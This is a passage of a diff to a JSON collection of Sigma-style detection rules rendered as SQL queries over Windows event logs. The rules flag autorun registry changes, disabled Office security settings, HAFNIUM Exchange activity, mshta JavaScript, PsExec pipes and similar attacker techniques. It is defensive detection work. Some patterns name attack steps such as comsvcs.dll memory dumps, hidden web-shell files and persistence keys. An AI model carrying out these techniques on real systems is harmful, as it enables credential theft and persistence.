'%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE '%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE '%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_svchost_susp_parent_process.yml" + "filename": "registry_set_chrome_extension.yml" }, { - "title": "Renamed ZOHO Dctask64 Execution", - "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", - "status": "test", - "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", - "author": "Florian Roth (Nextron Systems)", + "title": "CurrentVersion NT Autorun Keys Modification", + "id": "cbf93e5d-ca6c-4722-8bea-e9119007c248", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1055.001", - "attack.t1202", - "attack.t1218" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown yet" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\VmApplet%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Taskman%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GpExtensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AppSetup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AlternateShells\\\\AvailableShells%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\IconServiceLib%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Font Drivers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Load%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\DisableExceptionChainValidation' ESCAPE '\\' OR TargetObject LIKE '%\\\\MitigationOptions' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\ClickToRunStore\\\\HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\PreviousPolicyAreas%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\MaxNoGPOListChangesInterval%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000009)', 'DWORD (0x000003c0)')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Delete Cached Update Binary' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe\"' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_dctask64.yml" + "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml" }, { - "title": "HAFNIUM Exchange Exploitation Activity", - "id": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7", - "status": "test", - "description": "Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Persistence Via TypedPaths", + "id": "086ae989-9ca6-4fe7-895a-759c5544f247", + "status": "experimental", + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546", - "attack.t1053" + "attack.persistence" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%attrib%' ESCAPE '\\' AND CommandLine LIKE '% +h %' ESCAPE '\\' AND CommandLine LIKE '% +s %' ESCAPE '\\' AND CommandLine LIKE '% +r %' ESCAPE '\\' AND CommandLine LIKE '%.aspx%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\ProgramData\\\\VSPerfMon\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%VSPerfMon%' ESCAPE '\\')) OR (NewProcessName LIKE '%Opera\\_browser.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\')) OR NewProcessName LIKE '%Users\\\\Public\\\\opera\\\\Opera\\_browser.exe' ESCAPE '\\' OR (CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%Temp\\\\\\_\\_output%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\makecab.exe' ESCAPE '\\' AND CommandLine LIKE '%inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dmp.zip%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\makecab.exe' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' OR CommandLine LIKE '%compressionmemory%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\')) OR (CommandLine LIKE '% -t7z %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Programdata\\\\pst%' ESCAPE '\\' AND CommandLine LIKE '%\\\\it.zip%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\comsvcs.dll%' ESCAPE '\\' AND CommandLine LIKE '%Minidump%' ESCAPE '\\' AND CommandLine LIKE '%full %' ESCAPE '\\' AND CommandLine LIKE '%\\\\inetpub\\\\wwwroot%' ESCAPE '\\') OR (CommandLine LIKE '%Windows\\\\Temp\\\\xx.bat%' ESCAPE '\\' OR CommandLine LIKE '%Windows\\\\WwanSvcdcs%' ESCAPE '\\' OR CommandLine LIKE '%Windows\\\\Temp\\\\cw.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_hafnium.yml" + "filename": "registry_set_persistence_typed_paths.yml" }, { - "title": "Suspicious JavaScript Execution Via Mshta.EXE", - "id": "67f113fa-e23d-4271-befa-30113b3e08b1", + "title": "Disable Microsoft Office Security Features", + "id": "7c637634-c95d-4bbf-b26c-a82510874b34", "status": "test", - "description": "Detects execution of javascript code using \"mshta.exe\".", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "description": "Disable Microsoft Office Security Features by registry", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.005" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_mshta_javascript.yml" + "filename": "registry_set_disable_microsoft_office_security_features.yml" }, { - "title": "Directory Removal Via Rmdir", - "id": "41ca393d-538c-408a-ac27-cf1e038be80c", + "title": "Add DisallowRun Execution to Registry", + "id": "275641a5-a492-45e2-a817-7c81e9d9d3e9", "status": "experimental", - "description": "Detects execution of the builtin \"rmdir\" command in order to delete directories.\nAdversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", + "description": "Detect set DisallowRun to 1 to prevent user running specific computer program", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1070.004" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%rmdir%' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%/q%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\DisallowRun' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_cmd_rmdir_execution.yml" + "filename": "registry_set_disallowrun_execution.yml" }, { - "title": "PsExec Default Named Pipe", - "id": "f3f3a972-f982-40ad-b63c-bca6afdfad7c", - "status": "test", - "description": "Detects PsExec service installation and execution events (service and Sysmon)", - "author": "Thomas Patzke", + "title": "Modify User Shell Folders Startup Value", + "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", + "status": "experimental", + "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.001" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" ], - "filename": "pipe_created_psexec_default_pipe.yml" + "filename": "registry_set_susp_user_shell_folders.yml" }, { - "title": "PsExec Pipes Artifacts", - "id": "9e77ed63-2ecf-4c7b-b09d-640834882028", - "status": "test", - "description": "Detecting use PsExec via Pipe Creation/Access to pipes", - "author": "Nikita Nazarov, oscd.community", + "title": "CurrentVersion Autorun Keys Modification", + "id": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.execution", - "attack.t1569.002" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate Administrator activity" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE 'psexec%' ESCAPE '\\' OR PipeName LIKE 'paexec%' ESCAPE '\\' OR PipeName LIKE 'remcom%' ESCAPE '\\' OR PipeName LIKE 'csexec%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\System\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Explorer\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logoff%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\PLAP Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Provider Filters%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)' OR TargetObject LIKE '%\\\\NgcFirst\\\\ConsecutiveSwitchCount' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\devicecensus.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\winsat.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\KeePass Password Safe 2\\\\ShInstUtil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Everything\\\\Everything.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\LogonUI.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{D6886603-9D2F-4EB2-B667-1971041FA96B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{BEC09223-B018-416D-A0AC-523971B639F5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\regsvr32.exe' ESCAPE '\\' AND TargetObject LIKE '%DropboxExt%' ESCAPE '\\' AND NewValue LIKE '%A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Opera Browser Assistant' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Opera\\\\assistant\\\\browser\\_assistant.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\iTunesHelper' ESCAPE '\\' AND NewValue LIKE '\"C:\\\\Program Files\\\\iTunes\\\\iTunesHelper.exe\"' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\zoommsirepair' ESCAPE '\\' AND NewValue LIKE '\"C:\\\\Program Files\\\\Zoom\\\\bin\\\\installer.exe\" /repair' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Greenshot' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Greenshot\\\\Greenshot.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\GoogleDriveFS' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\GoogleDriveFS.exe%' ESCAPE '\\') OR (TargetObject LIKE '%GoogleDrive%' ESCAPE '\\' AND NewValue IN ('{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}', '{A8E52322-8734-481D-A7E2-27B309EF8D56}', '{C973DA94-CBDF-4E77-81D1-E5B794FBD146}', '{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}')) OR ((NewValue LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c rmdir /s /q \"C:\\\\Users\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\') AND NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{%' ESCAPE '\\' AND NewValue LIKE '%\\\\AppData\\\\Local\\\\Package Cache\\\\{%' ESCAPE '\\' AND NewValue LIKE '%}\\\\python-%' ESCAPE '\\' AND NewValue LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND NewValue LIKE '%\\\\Microsoft\\\\Teams\\\\Update.exe --processStart %' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\userinit.exe' ESCAPE '\\' AND NewValue = 'ctfmon.exe /n') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\Setup\\\\%' ESCAPE '\\' AND (NewValue LIKE '\"C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR NewValue LIKE '\"C:\\\\Program Files (x86)\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR NewValue LIKE '{472083B0-C522-11CF-8763-00608CC02F24}' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\aurora-dashboard' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Aurora-Agent\\\\tools\\\\aurora-dashboard.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Everything' ESCAPE '\\' AND NewValue LIKE '%\\\\Everything\\\\Everything.exe\" -startup' ESCAPE 